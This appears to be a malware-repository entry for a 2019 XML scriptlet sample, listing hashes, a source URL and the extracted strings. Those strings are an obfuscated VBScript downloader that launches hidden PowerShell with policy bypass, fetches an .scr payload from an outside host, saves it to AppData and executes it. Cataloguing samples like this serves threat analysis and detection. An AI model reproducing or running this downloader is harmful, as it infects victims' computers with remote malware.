Sample details: dcd70f5a38469a0f207049d7b7bfbe1c --

Hashes
MD5: dcd70f5a38469a0f207049d7b7bfbe1c
SHA1: 267cc2cc14eae0fc4ae065db0364c19883e673a5
SHA256: 23cb61f8dd74681f670d8c5ee6e9acd0f2b82425591faf64aecb2621722a5406
SSDEEP: 24:34UVwdTnVWJ9DHPHDOfoV6jJX8JQkT+9Y1vn5FUf+JJuRMLn:Ify9beV1MCkTT5F1uKL
Details
File Type: XML
Added: 2019-10-09 15:11:44
Yara Hits
Source
http://malev-bg.com/xmlInstall/regsec1
Strings
		<?xml version="1.0"?>
<package>
<component id="quefaRxllKFLeuWPZDcUHTAFwZRLYWHLWxgsgXMBRsiAtABlZDRZRT8625938468464115">
<script language="VBSCRIpt">
<![CDATA[
dim       BHYJrfddxtPG       :       diM       VeFIDLbxfGgc       :       SeT       BHYJrfddxtPG       =       cREAteObjeCt       (       Chr(&H57) & Chr(&H53) & Chr(&H43) & ChrW(&H72) & Chr(&H49) & Chr(&H50) & Chr(&H74) & ChrW(&H2E) & Chr(&H73) & ChrW(&H68) & ChrW(&H45) & Chr(&H6C) & Chr(&H4C)       )       :       VeFIDLbxfGgc       =       "			 		 		 	   poweRsheLL.EXE 	     	-Ex            ByPASS								 -NOP	        	-w            1							 set-CoNTenT			 	  	  	-vA	  	  ( 		NEw-ObjeCT			NEt.WeBcLIENT  	 			 ).doWNLoaDdatA( 					'http://malev-bg.com/xmlInstall/adkp.scr'  		 	     )	 	  	  -En											 BYtE 							-PaTH 	 '%ApPData%\df34RtujnSF45r.scr' 	 ;	         	inVOKE-exPReSSioN      '%aPPdaTA%\df34RtujnSF45r.scr'"       :       BHYJrfddxtPG.run       cHr       (       34       )       &       BHYJrfddxtPG.expANdeNvIRonmEnTStrIngS(       Chr(&H25) & Chr(&H63) & ChrW(&H4F) & Chr(&H6D) & ChrW(&H73) & Chr(&H70) & ChrW(&H45) & Chr(&H63) & ChrW(&H25)       )       &       cHR       (       34       )       &       chR       (       34       )       &       ChrW(&H2F) & ChrW(&H43) & ChrW(&H20)       &       VeFIDLbxfGgc       &       cHr       (       34       )       ,       0       :       SET       BHYJrfddxtPG       =       NoTHINg
</script>
<body>
</body>
</component>
</package>